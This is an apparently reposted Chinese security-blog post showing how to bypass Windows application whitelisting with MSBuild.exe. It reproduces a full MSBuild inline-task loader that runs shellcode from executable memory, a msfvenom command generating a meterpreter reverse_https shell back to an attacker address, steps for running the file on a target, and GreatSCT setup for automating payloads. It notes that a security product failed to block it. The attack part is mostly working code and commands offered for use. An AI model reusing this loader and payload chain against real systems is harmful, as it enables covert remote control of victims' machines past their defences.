最新消息:

GreatSCT | MSF | 白名单

内网渗透 demon 1764浏览 0评论

简介

国外的安全研究员Casey Smith,于2016年9月13日星期二在其博客发表了一篇题为“使用MSBuild.exe绕过应用程序白名单 – 设备保护示例及缓解措施”的文章。但目前其博客已被关闭,如果大家想查看原文可以点击该链接进行查阅:https://web.archive.org/web/20161212224652/http://subt0x10.blogspot.com/2016/09/bypassing-application-whitelisting.html 。以下为我测试当中的截图内容,可以看到某安全防护软件并未对其拦截查杀。

POC

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
    <Target Name="Hello">
      <ClassExample />
    </Target>
    <UsingTask
      TaskName="ClassExample"
      TaskFactory="CodeTaskFactory"
      AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
      <Task>
      
        <Code Type="Class" Language="cs">
        <![CDATA[
    using System;
    using System.Runtime.InteropServices;
    using Microsoft.Build.Framework;
    using Microsoft.Build.Utilities;
    public class ClassExample :  Task, ITask
    {         
      private static UInt32 MEM_COMMIT = 0x1000;          
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
      [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
      [DllImport("kernel32")]
        private static extern IntPtr CreateThread(            
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId           
        );
      [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(           
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );          
      public override bool Execute()
      {
        byte[] shellcode = new byte[] { INSERT_SHELLCODE_HERE };
          
          UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
      MEM_COMMIT, PAGE_EXECUTE_READWRITE);
          Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
          IntPtr hThread = IntPtr.Zero;
          UInt32 threadId = 0;
          IntPtr pinfo = IntPtr.Zero;
          hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
          WaitForSingleObject(hThread, 0xFFFFFFFF);
          return true;
      } 
    }     
        ]]>
        </Code>
      </Task>
    </UsingTask>
  </Project>

 

MSF&MSBuild.exe

通过metasploit以下命令生成C# shellcode:

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -f csharp

在msfconsole中启动metasploit监听处理程序,并将“msbuild.exe”xml文件复制到目标系统。我当前的系统环境为Windows 10 Enterprise,命令执行如下:

“C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe shellcode.xml”.

自动化生成PAYLOAD

我们将使用GreatSCT来生成一个“msbuild.exe”有效载荷,命令如下:

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
python3 ./gr8sct.py

按任意键开始

选择选项编号“0”并回车:

设置IP

得到会话

视频演示:

原文链接:blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/

转载请注明:即刻安全 » GreatSCT | MSF | 白名单

您必须 登录 才能发表评论!



合作伙伴